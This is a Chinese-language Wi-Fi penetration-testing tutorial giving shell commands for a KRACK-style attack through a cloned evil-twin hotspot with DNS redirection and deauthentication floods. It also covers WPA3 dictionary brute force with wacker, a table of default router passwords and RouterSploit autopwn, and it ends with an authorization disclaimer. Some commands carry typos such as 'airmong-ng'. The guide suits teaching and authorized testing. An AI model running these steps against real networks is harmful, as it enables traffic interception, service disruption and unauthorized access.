无线渗透|Wi-Fi渗透思路
字数 1596 2025-08-06 20:12:41

Wi-Fi渗透测试全面指南

基础知识

WPA2/WPA3概述

  • WPA2:WPA的升级版,引入PSK(预共享密钥模式),安全性优于WPA但仍有漏洞
  • WPA3:新一代安全协议,增加对字典暴力破解的防护,使用SAE(对等实体验证)取代PSK
  • AP:无线网络接入点(如路由器)的统称

硬件要求

  • 建议使用支持802.11ac协议的无线网卡
  • 通常需要两张或更多网卡进行攻击

WPA2渗透方法

密钥重装攻击(KRACK)

攻击原理

  • 利用WPA2四次握手过程中的Nonce重装漏洞
  • 通过重放第三次握手包来重置加密密钥
  • 最终可解密目标网络中的所有流量

实施步骤

  1. 启动网卡监听模式

    sudo airmong-ng start <device1>
    
  2. 目标AP信息收集

    sudo airodump-ng <device1>
    
  3. 锁定目标BSSID

    sudo airodump-ng <device1> --bssid=<target bssid>
    
  4. 克隆钓鱼热点

    • 更改网卡MAC地址:
      sudo ifconfig device2 down
      sudo macchanger device2 -m <newmac>
      sudo ifconfig device2 up
      
    • 伪造热点:
      sudo airmong start wlan2
      sudo airbase-ng -e <target SSID> -c <channel> <device2>
      sudo ifconfig at0 up
      
  5. 配置网络参数

    • 编辑/etc/network/interfaces
      auto at0
      iface at0 inet static
      address 192.168.199.1
      netmask 255.255.255.0
      
    • 重启网络服务:
      sudo service networking restart
      
  6. 配置DHCP服务

    • 编辑/etc/dhcp/dhcpd.conf
      subnet 192.168.199.0 netmask 255.255.255.0{
          range 192.168.199.100 192.168.199.150;
          option routers 192.168.199.1;
          option subnet-mask 255.255.255.0;
          option domain-name-servers 192.168.178.99;
      }
      
    • 指定DHCP服务网卡:
      sudo vi /etc/default/isc-dhcp-server
      
      修改为INTERFACESv4="at0"
  7. 配置DNS服务

    • 编辑/etc/dnsmasq.conf
      resolv-file=/etc/resolv.conf
      strict-order
      listen-address=192.168.199.113
      address=/baidu.com/192.168.178.99
      server=8.8.8.8
      server=114.114.114.114
      
  8. 设置流量转发

    iptables -t nat -A POSTROUTING -s 192.168.199.0/24 -j SNAT --to 192.168.178.99
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
    iptables -A FORWARD -p tcp --syn -s 192.168.199.0/24 -j TCPMSS --set-mss 1356
    iptables-save
    
  9. 强制设备重连

    • 使用aireplay-ng:
      sudo aireplay-ng -0 0 -a <target AP BSSID> -c <target member MAC> <device1>
      
    • 使用mdk3/mdk4:
      sudo mdk3 <device> d -s 1000 -b blacklist.txt -c <target channel>
      
  10. 捕获握手包

    • 使用Wireshark分析捕获的握手包
    • 标记并导出第三次握手包
  11. 实施攻击

    • 使用scapy伪造CSA信标
    • 重发第三次握手包
    sudo scapy
    

相关工具

WPA3攻击方法

使用wacker工具进行字典攻击

  1. 安装准备

    git clone https://github.com/blunderbuss-wctf/wacker.git
    cd wacker
    apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
    cd wpa_supplicant-2.8/wpa_supplicant/
    cp defconfig_brute_force .config
    make -j4
    
  2. 使用wacker

    ./wacker.py --wordlist <wordlist> --interface <interface> --bssid <BSSID> --ssid <SSID> --freq <freq>
    

社会工程学方法

  1. 直接询问:向网络管理员或相关人员询问密码
  2. 密码泄露工具:使用Wi-Fi万能钥匙等工具获取共享密码
  3. 二维码扫描:扫描设备生成的Wi-Fi二维码获取密码

路由器后台渗透

常见默认凭证

路由器品牌 默认用户名 默认密码
TP-LINK家用 admin admin
TP-LINK企业级 admin admin123456
Tenda admin admin
360 admin admin
华为 admin admin
Netcore guest guest
小米 (无) (无)
FAST admin admin
D-Link admin admin
PHICOMM admin admin

漏洞利用工具

  1. RouterSploit

    • 安装:
      git clone https://github.com/threat9/routersploit.git
      cd routersploit
      pip3 install -r requirements.txt
      
    • 使用:
      sudo ./rsf.py
      use scanners/autopwn
      set target <路由器IP>
      run
      
  2. 在线漏洞资源

注意事项

  1. 渗透测试前确保获得合法授权
  2. 攻击可能造成网络中断,需谨慎操作
  3. 保持工具和系统更新以支持最新协议
  4. 实际环境中可能需要结合多种技术手段
  5. 注意法律风险,仅在授权范围内测试
Wi-Fi渗透测试全面指南 基础知识 WPA2/WPA3概述 WPA2 :WPA的升级版,引入PSK(预共享密钥模式),安全性优于WPA但仍有漏洞 WPA3 :新一代安全协议,增加对字典暴力破解的防护,使用SAE(对等实体验证)取代PSK AP :无线网络接入点(如路由器)的统称 硬件要求 建议使用支持802.11ac协议的无线网卡 通常需要两张或更多网卡进行攻击 WPA2渗透方法 密钥重装攻击(KRACK) 攻击原理 利用WPA2四次握手过程中的Nonce重装漏洞 通过重放第三次握手包来重置加密密钥 最终可解密目标网络中的所有流量 实施步骤 启动网卡监听模式 目标AP信息收集 锁定目标BSSID 克隆钓鱼热点 更改网卡MAC地址: 伪造热点: 配置网络参数 编辑 /etc/network/interfaces : 重启网络服务: 配置DHCP服务 编辑 /etc/dhcp/dhcpd.conf : 指定DHCP服务网卡: 修改为 INTERFACESv4="at0" 配置DNS服务 编辑 /etc/dnsmasq.conf : 设置流量转发 强制设备重连 使用aireplay-ng: 使用mdk3/mdk4: 捕获握手包 使用Wireshark分析捕获的握手包 标记并导出第三次握手包 实施攻击 使用scapy伪造CSA信标 重发第三次握手包 相关工具 KRACK攻击POC: https://github.com/vanhoefm/krackattacks-poc-zerokey KRACK脚本: https://github.com/vanhoefm/krackattacks-scripts WPA3攻击方法 使用wacker工具进行字典攻击 安装准备 使用wacker 社会工程学方法 直接询问 :向网络管理员或相关人员询问密码 密码泄露工具 :使用Wi-Fi万能钥匙等工具获取共享密码 二维码扫描 :扫描设备生成的Wi-Fi二维码获取密码 路由器后台渗透 常见默认凭证 | 路由器品牌 | 默认用户名 | 默认密码 | |------------------|------------|----------------| | TP-LINK家用 | admin | admin | | TP-LINK企业级 | admin | admin123456 | | Tenda | admin | admin | | 360 | admin | admin | | 华为 | admin | admin | | Netcore | guest | guest | | 小米 | (无) | (无) | | FAST | admin | admin | | D-Link | admin | admin | | PHICOMM | admin | admin | 漏洞利用工具 RouterSploit 安装: 使用: 在线漏洞资源 RouterPwn: http://routerpwn.com/ 注意事项 渗透测试前确保获得合法授权 攻击可能造成网络中断,需谨慎操作 保持工具和系统更新以支持最新协议 实际环境中可能需要结合多种技术手段 注意法律风险,仅在授权范围内测试